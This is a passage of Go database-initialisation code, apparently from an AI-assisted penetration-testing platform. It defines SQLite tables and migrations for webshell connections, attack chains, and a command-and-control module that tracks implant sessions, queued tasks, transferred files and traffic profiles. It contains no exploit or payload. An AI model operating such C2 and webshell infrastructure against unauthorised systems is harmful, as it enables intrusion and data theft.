DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + + // 创建 WebShell 连接扩展状态表(前端工作区/终端状态持久化) + createWebshellConnectionStatesTable := ` + CREATE TABLE IF NOT EXISTS webshell_connection_states ( + connection_id TEXT PRIMARY KEY, + state_json TEXT NOT NULL DEFAULT '{}', + updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (connection_id) REFERENCES webshell_connections(id) ON DELETE CASCADE + );` + + // ======================================================================== + // C2 模块(监听器 / 会话 / 任务 / 文件 / 事件 / Malleable Profile) + // ======================================================================== + createC2ListenersTable := ` + CREATE TABLE IF NOT EXISTS c2_listeners ( + id TEXT PRIMARY KEY, + project_id TEXT, + name TEXT NOT NULL, + type TEXT NOT NULL, + bind_host TEXT NOT NULL DEFAULT '127.0.0.1', + bind_port INTEGER NOT NULL, + profile_id TEXT, + encryption_key TEXT NOT NULL DEFAULT '', + implant_token TEXT NOT NULL DEFAULT '', + status TEXT NOT NULL DEFAULT 'stopped', + config_json TEXT NOT NULL DEFAULT '{}', + remark TEXT NOT NULL DEFAULT '', + owner_user_id TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + started_at DATETIME, + last_error TEXT + );` + + createC2SessionsTable := ` + CREATE TABLE IF NOT EXISTS c2_sessions ( + id TEXT PRIMARY KEY, + listener_id TEXT NOT NULL, + implant_uuid TEXT NOT NULL UNIQUE, + hostname TEXT, + username TEXT, + os TEXT, + arch TEXT, + pid INTEGER DEFAULT 0, + process_name TEXT, + is_admin INTEGER DEFAULT 0, + internal_ip TEXT, + external_ip TEXT, + user_agent TEXT, + sleep_seconds INTEGER NOT NULL DEFAULT 5, + jitter_percent INTEGER NOT NULL DEFAULT 0, + status TEXT NOT NULL DEFAULT 'active', + first_seen_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + last_check_in DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + metadata_json TEXT DEFAULT '{}', + note TEXT NOT NULL DEFAULT '', + FOREIGN KEY (listener_id) REFERENCES c2_listeners(id) ON DELETE CASCADE + );` + + createC2TasksTable := ` + CREATE TABLE IF NOT EXISTS c2_tasks ( + id TEXT PRIMARY KEY, + session_id TEXT NOT NULL, + task_type TEXT NOT NULL, + payload_json TEXT NOT NULL DEFAULT '{}', + status TEXT NOT NULL DEFAULT 'queued', + result_text TEXT, + result_blob_path TEXT, + error TEXT, + source TEXT NOT NULL DEFAULT 'manual', + conversation_id TEXT, + approval_status TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + sent_at DATETIME, + started_at DATETIME, + completed_at DATETIME, + duration_ms INTEGER DEFAULT 0, + FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE + );` + + createC2FilesTable := ` + CREATE TABLE IF NOT EXISTS c2_files ( + id TEXT PRIMARY KEY, + session_id TEXT NOT NULL, + task_id TEXT, + direction TEXT NOT NULL, + remote_path TEXT NOT NULL, + local_path TEXT NOT NULL, + size_bytes INTEGER DEFAULT 0, + sha256 TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE + );` + + createC2EventsTable := ` + CREATE TABLE IF NOT EXISTS c2_events ( + id TEXT PRIMARY KEY, + level TEXT NOT NULL DEFAULT 'info', + category TEXT NOT NULL, + session_id TEXT, + task_id TEXT, + message TEXT NOT NULL, + data_json TEXT, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + + createAuditLogsTable := ` + CREATE TABLE IF NOT EXISTS audit_logs ( + id TEXT PRIMARY KEY, + created_at DATETIME NOT NULL, + level TEXT NOT NULL DEFAULT 'info', + category TEXT NOT NULL, + action TEXT NOT NULL, + result TEXT NOT NULL, + actor TEXT NOT NULL DEFAULT 'admin', + session_hint TEXT, + client_ip TEXT, + user_agent TEXT, + resource_type TEXT, + resource_id TEXT, + message TEXT NOT NULL, + detail_json TEXT + );` + + createC2ProfilesTable := ` + CREATE TABLE IF NOT EXISTS c2_profiles ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL UNIQUE, + user_agent TEXT, + uris_json TEXT NOT NULL DEFAULT '[]', + request_headers_json TEXT, + response_headers_json TEXT, + body_template TEXT, + jitter_min_ms INTEGER DEFAULT 0, + jitter_max_ms INTEGER DEFAULT 0, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + );` + + createWorkflowDefinitionsTable := ` + CREATE TABLE IF NOT EXISTS workflow_definitions ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL, + description TEXT, + version INTEGER NOT NULL DEFAULT 1, + graph_json TEXT NOT NULL, + enabled INTEGER NOT NULL DEFAULT 1, + created_at DATETIME NOT NULL, + updated_at DATETIME NOT NULL + );` + + createWorkflowRunsTable := ` + CREATE TABLE IF NOT EXISTS workflow_runs ( + id TEXT PRIMARY KEY, + workflow_id TEXT NOT NULL, + workflow_version INTEGER NOT NULL DEFAULT 1, + conversation_id TEXT, + project_id TEXT, + role_id TEXT, + status TEXT NOT NULL, + input_json TEXT, + output_json TEXT, + error TEXT, + pending_hitl_node_id TEXT, + pending_hitl_json TEXT, + started_at DATETIME NOT NULL, + finished_at DATETIME, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL + );` + + createWorkflowNodeRunsTable := ` + CREATE TABLE IF NOT EXISTS workflow_node_runs ( + id TEXT PRIMARY KEY, + run_id TEXT NOT NULL, + node_id TEXT NOT NULL, + status TEXT NOT NULL, + input_json TEXT, + output_json TEXT, + error TEXT, + started_at DATETIME NOT NULL, + finished_at DATETIME, + created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (run_id) REFERENCES workflow_runs(id) ON DELETE CASCADE + );` + + createWorkflowPackageInspectionsTable := ` + CREATE TABLE IF NOT EXISTS workflow_package_inspections ( + id TEXT PRIMARY KEY, package_hash TEXT NOT NULL, manifest_json TEXT NOT NULL, + workflow_payload_json TEXT NOT NULL, inspection_json TEXT NOT NULL, + source_workflow_id TEXT NOT NULL, source_revision INTEGER NOT NULL, + source_content_hash TEXT NOT NULL, source_graph_hash TEXT NOT NULL, + local_conflict_state TEXT NOT NULL CHECK (local_conflict_state IN ('none','identical','id_conflict')), + local_workflow_id TEXT, local_content_hash TEXT, local_graph_hash TEXT, + created_by TEXT NOT NULL, status TEXT NOT NULL DEFAULT 'ready' CHECK (status IN ('ready','consumed','expired')), + created_at DATETIME NOT NULL, expires_at DATETIME NOT NULL, consumed_at DATETIME + );` + createWorkflowPackageImportsTable := ` + CREATE TABLE IF NOT EXISTS workflow_package_imports ( + id TEXT PRIMARY KEY, inspection_id TEXT NOT NULL, request_hash TEXT NOT NULL, + idempotency_key TEXT NOT NULL, actor_user_id TEXT NOT NULL, + action TEXT NOT NULL CHECK (action IN ('create','keep_existing','overwrite','rename')), + source_workflow_id TEXT NOT NULL, target_workflow_id TEXT NOT NULL, resulting_workflow_id TEXT, + result TEXT NOT NULL CHECK (result IN ('created','overwritten','renamed','kept_existing','skipped_identical','failed')), + error_code TEXT, error_message TEXT, created_at DATETIME NOT NULL, applied_at DATETIME, + FOREIGN KEY (inspection_id) REFERENCES workflow_package_inspections(id) + );` + + // 创建索引 + createIndexes := ` + CREATE INDEX IF NOT EXISTS idx_messages_conversation_id ON messages(conversation_id); + CREATE INDEX IF NOT EXISTS idx_conversations_updated_at ON conversations(updated_at); + CREATE INDEX IF NOT EXISTS idx_process_details_message_id ON process_details(message_id); + CREATE INDEX IF NOT EXISTS idx_process_details_conversation_id ON process_details(conversation_id); + CREATE INDEX IF NOT EXISTS idx_tool_executions_tool_name ON tool_executions(tool_name); + CREATE INDEX IF NOT EXISTS idx_tool_executions_start_time ON tool_executions(start_time); + CREATE INDEX IF NOT EXISTS idx_tool_executions_status ON tool_executions(status); + CREATE INDEX IF NOT EXISTS idx_chain_nodes_conversation ON attack_chain_nodes(conversation_id); + CREATE INDEX IF NOT EXISTS idx_chain_edges_conversation ON attack_chain_edges(conversation_id); + CREATE INDEX IF NOT EXISTS idx_chain_edges_source ON attack_chain_edges(source_node_id); + CREATE INDEX IF NOT EXISTS idx_chain_edges_target ON attack_chain_edges(target_node_id); + CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_conversation ON knowledge_retrieval_logs(conversation_id); + CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_message ON knowledge_retrieval_logs(message_id); + CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_created_at ON knowledge_retrieval_logs(created_at); + CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_conversation ON conversation_group_mappings(conversation_id); + CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_group ON conversation_group_mappings(group_id); + CREATE INDEX IF NOT EXISTS idx_robot_user_sessions_updated_at ON robot_user_sessions(updated_at); + CREATE INDEX IF NOT EXISTS idx_conversations_pinned ON conversations(pinned); + CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id); + CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag); + CREATE INDEX IF NOT EXISTS idx_vulnerabilities_task_tag ON vulnerabilities(task_tag); + CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity); + CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status); + CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at); + CREATE INDEX IF NOT EXISTS idx_assets_last_seen ON assets(last_seen_at); + CREATE INDEX IF NOT EXISTS idx_assets_last_scan ON assets(last_scan_at); + CREATE INDEX IF NOT EXISTS idx_assets_ip ON assets(ip); + CREATE INDEX IF NOT EXISTS idx_assets_domain ON assets(domain); + CREATE INDEX IF NOT EXISTS idx_assets_status ON assets(status); + CREATE INDEX IF NOT EXISTS idx_assets_owner ON assets(owner_user_id); + CREATE INDEX IF NOT EXISTS idx_assets_project ON assets(project_id); + CREATE INDEX IF NOT EXISTS idx_assets_vulnerability_count ON assets(vulnerability_count); + CREATE INDEX IF NOT EXISTS idx_assets_risk_score ON assets(risk_score); + CREATE INDEX IF NOT EXISTS idx_assets_risk_level ON assets(risk_level); + CREATE INDEX IF NOT EXISTS idx_projects_status ON projects(status); + CREATE INDEX IF NOT EXISTS idx_projects_updated_at ON projects(updated_at); + CREATE INDEX IF NOT EXISTS idx_project_facts_project_id ON project_facts(project_id); + CREATE INDEX IF NOT EXISTS idx_project_facts_confidence ON project_facts(confidence); + CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id); + CREATE INDEX IF NOT EXISTS idx_project_fact_edges_project ON project_fact_edges(project_id); + CREATE INDEX IF NOT EXISTS idx_project_fact_edges_source ON project_fact_edges(project_id, source_fact_key); + CREATE INDEX IF NOT EXISTS idx_project_fact_edges_target ON project_fact_edges(project_id, target_fact_key); + CREATE INDEX IF NOT EXISTS idx_conversations_project_id ON conversations(project_id); + CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id); + CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id); + CREATE INDEX IF NOT EXISTS idx_batch_task_queues_created_at ON batch_task_queues(created_at); + CREATE INDEX IF NOT EXISTS idx_batch_task_queues_title ON batch_task_queues(title); + CREATE INDEX IF NOT EXISTS idx_webshell_connections_created_at ON webshell_connections(created_at); + CREATE INDEX IF NOT EXISTS idx_webshell_connections_project_id ON webshell_connections(project_id); + CREATE INDEX IF NOT EXISTS idx_webshell_connection_states_updated_at ON webshell_connection_states(updated_at); + CREATE INDEX IF NOT EXISTS idx_c2_listeners_created_at ON c2_listeners(created_at); + CREATE INDEX IF NOT EXISTS idx_c2_listeners_project_id ON c2_listeners(project_id); + CREATE INDEX IF NOT EXISTS idx_c2_listeners_status ON c2_listeners(status); + CREATE INDEX IF NOT EXISTS idx_c2_sessions_listener ON c2_sessions(listener_id); + CREATE INDEX IF NOT EXISTS idx_c2_sessions_status ON c2_sessions(status); + CREATE INDEX IF NOT EXISTS idx_c2_sessions_last_check_in ON c2_sessions(last_check_in); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_session ON c2_tasks(session_id); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_status ON c2_tasks(status); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_created_at ON c2_tasks(created_at); + CREATE INDEX IF NOT EXISTS idx_c2_tasks_conversation ON c2_tasks(conversation_id); + CREATE INDEX IF NOT EXISTS idx_c2_files_session ON c2_files(session_id); + CREATE INDEX IF NOT EXISTS idx_c2_events_created_at ON c2_events(created_at); + CREATE INDEX IF NOT EXISTS idx_c2_events_category ON c2_events(category); + CREATE INDEX IF NOT EXISTS idx_c2_events_session ON c2_events(session_id); + CREATE INDEX IF NOT EXISTS idx_audit_logs_created_at ON audit_logs(created_at); + CREATE INDEX IF NOT EXISTS idx_audit_logs_category ON audit_logs(category); + CREATE INDEX IF NOT EXISTS idx_audit_logs_action ON audit_logs(action); + CREATE INDEX IF NOT EXISTS idx_audit_logs_result ON audit_logs(result); + CREATE INDEX IF NOT EXISTS idx_workflow_definitions_updated_at ON workflow_definitions(updated_at); + CREATE INDEX IF NOT EXISTS idx_workflow_definitions_enabled ON workflow_definitions(enabled); + CREATE INDEX IF NOT EXISTS idx_workflow_runs_workflow ON workflow_runs(workflow_id); + CREATE INDEX IF NOT EXISTS idx_workflow_runs_conversation ON workflow_runs(conversation_id); + CREATE INDEX IF NOT EXISTS idx_workflow_runs_status ON workflow_runs(status); + CREATE INDEX IF NOT EXISTS idx_workflow_node_runs_run ON workflow_node_runs(run_id); + CREATE INDEX IF NOT EXISTS idx_workflow_package_inspections_creator_expiry ON workflow_package_inspections(created_by, expires_at); + CREATE UNIQUE INDEX IF NOT EXISTS uq_workflow_package_imports_actor_key ON workflow_package_imports(actor_user_id, idempotency_key); + CREATE UNIQUE INDEX IF NOT EXISTS uq_workflow_package_imports_inspection_success ON workflow_package_imports(inspection_id) WHERE result IN ('created','overwritten','renamed','kept_existing','skipped_identical'); + ` + + if _, err := db.Exec(createConversationsTable); err != nil { + return fmt.Errorf("创建conversations表失败: %w", err) + } + + if _, err := db.Exec(createMessagesTable); err != nil { + return fmt.Errorf("创建messages表失败: %w", err) + } + + if _, err := db.Exec(createProcessDetailsTable); err != nil { + return fmt.Errorf("创建process_details表失败: %w", err) + } + + if _, err := db.Exec(createToolExecutionsTable); err != nil { + return fmt.Errorf("创建tool_executions表失败: %w", err) + } + + if _, err := db.Exec(createToolStatsTable); err != nil { + return fmt.Errorf("创建tool_stats表失败: %w", err) + } + + if _, err := db.Exec(createSkillStatsTable); err != nil { + return fmt.Errorf("创建skill_stats表失败: %w", err) + } + + if _, err := db.Exec(createAttackChainNodesTable); err != nil { + return fmt.Errorf("创建attack_chain_nodes表失败: %w", err) + } + + if _, err := db.Exec(createAttackChainEdgesTable); err != nil { + return fmt.Errorf("创建attack_chain_edges表失败: %w", err) + } + + if _, err := db.Exec(createKnowledgeRetrievalLogsTable); err != nil { + return fmt.Errorf("创建knowledge_retrieval_logs表失败: %w", err) + } + + if _, err := db.Exec(createConversationGroupsTable); err != nil { + return fmt.Errorf("创建conversation_groups表失败: %w", err) + } + + if _, err := db.Exec(createConversationGroupMappingsTable); err != nil { + return fmt.Errorf("创建conversation_group_mappings表失败: %w", err) + } + if _, err := db.Exec(createRobotUserSessionsTable); err != nil { + return fmt.Errorf("创建robot_user_sessions表失败: %w", err) + } + if err := db.migrateRobotUserSessionsTable(); err != nil { + return fmt.Errorf("迁移robot_user_sessions表失败: %w", err) + } + + if _, err := db.Exec(createProjectsTable); err != nil { + return fmt.Errorf("创建projects表失败: %w", err) + } + + if _, err := db.Exec(createProjectFactsTable); err != nil { + return fmt.Errorf("创建project_facts表失败: %w", err) + } + + if _, err := db.Exec(createProjectFactEdgesTable); err != nil { + return fmt.Errorf("创建project_fact_edges表失败: %w", err) + } + + if _, err := db.Exec(createVulnerabilitiesTable); err != nil { + return fmt.Errorf("创建vulnerabilities表失败: %w", err) + } + if _, err := db.Exec(createAssetsTable); err != nil { + return fmt.Errorf("创建assets表失败: %w", err) + } + if err := db.migrateAssetsTable(); err != nil { + return fmt.Errorf("迁移assets表失败: %w", err) + } + + if _, err := db.Exec(createBatchTaskQueuesTable); err != nil { + return fmt.Errorf("创建batch_task_queues表失败: %w", err) + } + + if _, err := db.Exec(createBatchTasksTable); err != nil { + return fmt.Errorf("创建batch_tasks表失败: %w", err) + } + + if _, err := db.Exec(createWebshellConnectionsTable); err != nil { + return fmt.Errorf("创建webshell_connections表失败: %w", err) + } + + if _, err := db.Exec(createWebshellConnectionStatesTable); err != nil { + return fmt.Errorf("创建webshell_connection_states表失败: %w", err) + } + + if _, err := db.Exec(createAuditLogsTable); err != nil { + return fmt.Errorf("创建audit_logs表失败: %w", err) + } + + if err := db.initRBACTables(); err != nil { + return fmt.Errorf("创建RBAC表失败: %w", err) + } + if _, err := db.Exec(createVulnerabilityAlertSubscriptionsTable); err != nil { + return fmt.Errorf("创建漏洞提醒订阅表失败: %w", err) + } + if _, err := db.Exec(createVulnerabilityAlertDeliveriesTable); err != nil { + return fmt.Errorf("创建漏洞提醒投递表失败: %w", err) + } + + for tableName, ddl := range map[string]string{ + "workflow_definitions": createWorkflowDefinitionsTable, + "workflow_runs": createWorkflowRunsTable, + "workflow_node_runs": createWorkflowNodeRunsTable, + "workflow_package_inspections": createWorkflowPackageInspectionsTable, + "workflow_package_imports": createWorkflowPackageImportsTable, + } { + if _, err := db.Exec(ddl); err != nil { + return fmt.Errorf("创建%s表失败: %w", tableName, err) + } + } + + for tableName, ddl := range map[string]string{ + "c2_listeners": createC2ListenersTable, + "c2_sessions": createC2SessionsTable, + "c2_tasks": createC2TasksTable, + "c2_files": createC2FilesTable, + "c2_events": createC2EventsTable, + "c2_profiles": createC2ProfilesTable, + } { + if _, err := db.Exec(ddl); err != nil { + return fmt.Errorf("创建%s表失败: %w", tableName, err) + } + } + + // 为已有表添加新字段(如果不存在)- 必须在创建索引之前 + if err := db.migrateConversationsTable(); err != nil { + db.logger.Warn("迁移conversations表失败", zap.Error(err)) + // 不返回错误,允许继续运行 + } + + if err := db.migrateMessagesTable(); err != nil { + db.logger.Warn("迁移messages表失败", zap.Error(err)) + // 不返回错误,允许继续运行 + } + + if err := db.migrateConversationGroupsTable(); err != nil { + db.logger.Warn("迁移conversation_groups表失败", zap.Error(err)) + // 不返回错误,允许继续运行 + } + + if err := db.migrateConversationGroupMappingsTable(); err != nil { + db.logger.Warn("迁移conversation_group_mappings表失败", zap.Error(err)) + // 不返回错误,允许继续运行 + } + + if err := db.migrateBatchTaskQueuesTable(); err != nil { + db.logger.Warn("迁移batch_task_queues表失败", zap.Error(err)) + // 不返回错误,允许继续运行 + } + if err := db.migrateVulnerabilitiesTable(); err != nil { + db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err)) + // 不返回错误,允许继续运行 + } + if err := db.migrateVulnerabilitiesConversationFK(); err != nil { + db.logger.Warn("迁移vulnerabilities会话外键失败", zap.Error(err)) + } + + if err := db.migrateProjectsTable(); err != nil { + db.logger.Warn("迁移projects相关表失败", zap.Error(err)) + } + if err := db.dropProjectFactVersionsTable(); err != nil { + db.logger.Warn("清理project_fact_versions表失败", zap.Error(err)) + } + + if err := db.migrateWebshellConnectionsTable(); err != nil { + db.logger.Warn("迁移webshell_connections表失败", zap.Error(err)) + // 不返回错误,允许继续运行 + } + if err := db.migrateC2ListenersTable(); err != nil { + db.logger.Warn("迁移c2_listeners表失败", zap.Error(err)) + } + if err := db.migrateWorkflowRunsTable(); err != nil { + db.logger.Warn("迁移workflow_runs表失败", zap.Error(err)) + } + if err := db.migrateToolExecutionsPartialOutputColumns(); err != nil { + db.logger.Warn("迁移tool_executions partial output字段失败", zap.Error(err)) + } + if err := db.migrateRBACOwnershipColumns(); err != nil { + db.logger.Warn("迁移RBAC资源归属字段失败", zap.Error(err)) + } + + if _, err := db.Exec(createIndexes); err != nil { + return fmt.Errorf("创建索引失败: %w", err) + } + db.logger.Debug("数据库表初始化完成") + return nil +} + +func (db *DB) migrateRobotUserSessionsTable() error { + var count int + if err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('robot_user_sessions') WHERE name='agent_mode'").Scan(&count); err != nil { + return err + } + if count == 0 { + _, err := db.Exec("ALTER TABLE robot_user_sessions ADD COLUMN agent_mode TEXT NOT NULL DEFAULT 'eino_single'") + return err + } + return nil +} + +func (db *DB) migrateToolExecutionsPartialOutputColumns() error { + for _, col := range []struct { + name string + stmt string + }{ + {"partial_output", "ALTER TABLE tool_executions ADD COLUMN partial_output TEXT"}, + {"partial_output_bytes", "ALTER TABLE tool_executions ADD COLUMN partial_output_bytes INTEGER NOT NULL DEFAULT 0"}, + {"partial_output_truncated", "ALTER TABLE tool_executions ADD COLUMN partial_output_truncated INTEGER NOT NULL DEFAULT 0"}, + {"partial_output_updated_at", "ALTER TABLE tool_executions ADD COLUMN partial_output_updated_at DATETIME"}, + } { + if err := db.addColumnIfMissing("tool_executions", col.name, col.stmt); err != nil { + return err + } + } + return nil +} + +// migrateAssetsTable keeps databases created by the first asset-management release compatible. +func (db *DB) migrateAssetsTable() error { + columns := []struct { + name string + ddl string + }{ + {"project_id", "ALTER TABLE assets ADD COLUMN project_id TEXT"}, + {"last_scan_at", "ALTER TABLE assets ADD COLUMN last_scan_at DATETIME"}, + {"last_scan_conversation_id", "ALTER TABLE assets ADD COLUMN last_scan_conversation_id TEXT NOT NULL DEFAULT ''"}, + {"last_scan_queue_id", "ALTER TABLE assets ADD COLUMN last_scan_queue_id TEXT NOT NULL DEFAULT ''"}, + {"last_scan_task_id", "ALTER TABLE assets ADD COLUMN last_scan_task_id TEXT NOT NULL DEFAULT ''"}, + {"responsible_person", "ALTER TABLE assets ADD COLUMN responsible_person TEXT NOT NULL DEFAULT ''"}, + {"department", "ALTER TABLE assets ADD COLUMN department TEXT NOT NULL DEFAULT ''"}, + {"business_system", "ALTER TABLE assets ADD COLUMN business_system TEXT NOT NULL DEFAULT ''"}, + {"environment", "ALTER TABLE assets ADD COLUMN environment TEXT NOT NULL DEFAULT ''"}, + {"criticality", "ALTER TABLE assets ADD COLUMN criticality TEXT NOT NULL DEFAULT ''"}, + {"vulnerability_count", "ALTER TABLE assets ADD COLUMN vulnerability_count INTEGER NOT NULL DEFAULT 0"}, + {"risk_score", "ALTER TABLE assets ADD COLUMN risk_score INTEGER NOT NULL DEFAULT 0"}, + {"risk_level", "ALTER TABLE assets ADD COLUMN risk_level TEXT NOT NULL DEFAULT 'unassessed'"}, + } + for _, column := range columns { + var count int + if err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('assets') WHERE name=?", column.name).Scan(&count); err != nil { + return err + } + if count == 0 { + if _, err := db.Exec(column.ddl); err != nil { + return err + } + } + } + return nil +} + +// migrateMessagesTable 迁移 messages 表,补充 updated_at 字段。 +// 语义:updated_at 表示该条消息最后一次被写入/更新的时间(例如助手占位消息在任务结束时更新正文)。 +func (db *DB) migrateMessagesTable() error { + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('messages') WHERE name='updated_at'").Scan(&count) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE messages ADD COLUMN updated_at DATETIME"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + return fmt.Errorf("添加 messages.updated_at 字段失败: %w", addErr) + } + } + } else if count == 0 { + if _, err := db.Exec("ALTER TABLE messages ADD COLUMN updated_at DATETIME"); err != nil { + errMsg := strings.ToLower(err.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + return fmt.Errorf("添加 messages.updated_at 字段失败: %w", err) + } + } + } + + // 回填已有数据:让 updated_at 至少等于 created_at,避免前端出现空/当前时间回退。 + _, _ = db.Exec("UPDATE messages SET updated_at = created_at WHERE updated_at IS NULL OR updated_at = ''") + + // reasoning_content:DeepSeek 思考模式 + 工具调用续跑;与 last_react_input 互补,供消息表回退路径回放 + var rcColCount int + errRC := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('messages') WHERE name='reasoning_content'").Scan(&rcColCount) + if errRC != nil { + if _, addErr := db.Exec("ALTER TABLE messages ADD COLUMN reasoning_content TEXT"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + return fmt.Errorf("添加 messages.reasoning_content 字段失败: %w", addErr) + } + } + } else if rcColCount == 0 { + if _, err := db.Exec("ALTER TABLE messages ADD COLUMN reasoning_content TEXT"); err != nil { + errMsg := strings.ToLower(err.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + return fmt.Errorf("添加 messages.reasoning_content 字段失败: %w", err) + } + } + } + return nil +} + +// migrateConversationsTable 迁移conversations表,添加新字段 +func (db *DB) migrateConversationsTable() error { + // 检查last_react_input字段是否存在 + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversations') WHERE name='last_react_input'").Scan(&count) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE conversations ADD COLUMN last_react_input TEXT"); addErr != nil { + // 如果字段已存在,忽略错误(SQLite错误信息可能不同) + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加last_react_input字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + // 字段不存在,添加它 + if _, err := db.Exec("ALTER TABLE conversations ADD COLUMN last_react_input TEXT"); err != nil { + db.logger.Warn("添加last_react_input字段失败", zap.Error(err)) + } + } + + // 检查last_react_output字段是否存在 + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversations') WHERE name='last_react_output'").Scan(&count) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE conversations ADD COLUMN last_react_output TEXT"); addErr != nil { + // 如果字段已存在,忽略错误 + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加last_react_output字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + // 字段不存在,添加它 + if _, err := db.Exec("ALTER TABLE conversations ADD COLUMN last_react_output TEXT"); err != nil { + db.logger.Warn("添加last_react_output字段失败", zap.Error(err)) + } + } + + // 检查pinned字段是否存在 + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversations') WHERE name='pinned'").Scan(&count) + if err != nil { + // 如果查询失败,尝试添加字段 + if _, addErr := db.Exec("ALTER TABLE conversations ADD COLUMN pinned INTEGER DEFAULT 0"); addErr != nil { + // 如果字段已存在,忽略错误 + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加pinned字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + // 字段不存在,添加它 + if _, err := db.Exec("ALTER TABLE conversations ADD COLUMN pinned INTEGER DEFAULT 0"); err != nil { + db.logger.Warn("添加pinned字段失败", zap.Error(err)) + } + } + + // 检查 webshell_connection_id 字段是否存在(WebShell AI 助手对话关联) + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversations') WHERE name='webshell_connection_id'").Scan(&count) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE conversations ADD COLUMN webshell_connection_id TEXT"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加webshell_connection_id字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + if _, err := db.Exec("ALTER TABLE conversations ADD COLUMN webshell_connection_id TEXT"); err != nil { + db.logger.Warn("添加webshell_connection_id字段失败", zap.Error(err)) + } + } + + // 检查 role_name 字段是否存在(对话绑定的业务角色,用于历史任务切换时恢复角色上下文) + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversations') WHERE name='role_name'").Scan(&count) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE conversations ADD COLUMN role_name TEXT NOT NULL DEFAULT '默认'"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加role_name字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + if _, err := db.Exec("ALTER TABLE conversations ADD COLUMN role_name TEXT NOT NULL DEFAULT '默认'"); err != nil { + db.logger.Warn("添加role_name字段失败", zap.Error(err)) + } + } + + // 检查 agent_mode 字段是否存在(对话绑定的执行模式,用于历史任务切换时恢复对话模式) + err = db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('conversations') WHERE name='agent_mode'").Scan(&count) + if err != nil { + if _, addErr := db.Exec("ALTER TABLE conversations ADD COLUMN agent_mode TEXT NOT NULL DEFAULT 'eino_single'"); addErr != nil { + errMsg := strings.ToLower(addErr.Error()) + if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") { + db.logger.Warn("添加agent_mode字段失败", zap.Error(addErr)) + } + } + } else if count == 0 { + if _, err := db.Exec("ALTER TABLE conversations ADD 